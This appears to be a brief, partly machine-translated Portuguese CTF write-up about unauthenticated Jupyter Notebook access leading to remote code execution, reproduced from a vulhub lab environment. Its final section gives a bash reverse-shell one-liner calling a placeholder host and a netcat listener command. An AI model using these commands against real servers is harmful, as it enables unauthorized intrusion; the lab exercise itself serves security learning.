1. Introdução
O Jupyter Notebook (anteriormente chamado de IPython notebook) é um notebook interativo que suporta a execução de mais de 40 linguagens de programação.
Se o administrador não configurar uma senha para o Jupyter Notebook, isso resultará em uma vulnerabilidade de acesso não autorizado, na qual os visitantes podem criar um console e executar códigos e comandos arbitrários do Python.
2. Reproduza o meio ambiente
Originado de https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/ map para facilitar a reprodução direta no ambiente BUUCTF REAL
3. Use
Crie uma nova janela de terminal, hehe hey, diretamente RCE,
como mostrado abaixo
4. Não sinto nada a dizer
Sobre o shell rebote
bash -i >& /dev/tcp/x.x.x.x/8080 0>&1
Então é só ouvir do outro lado
nc -lvp 8080(像这样)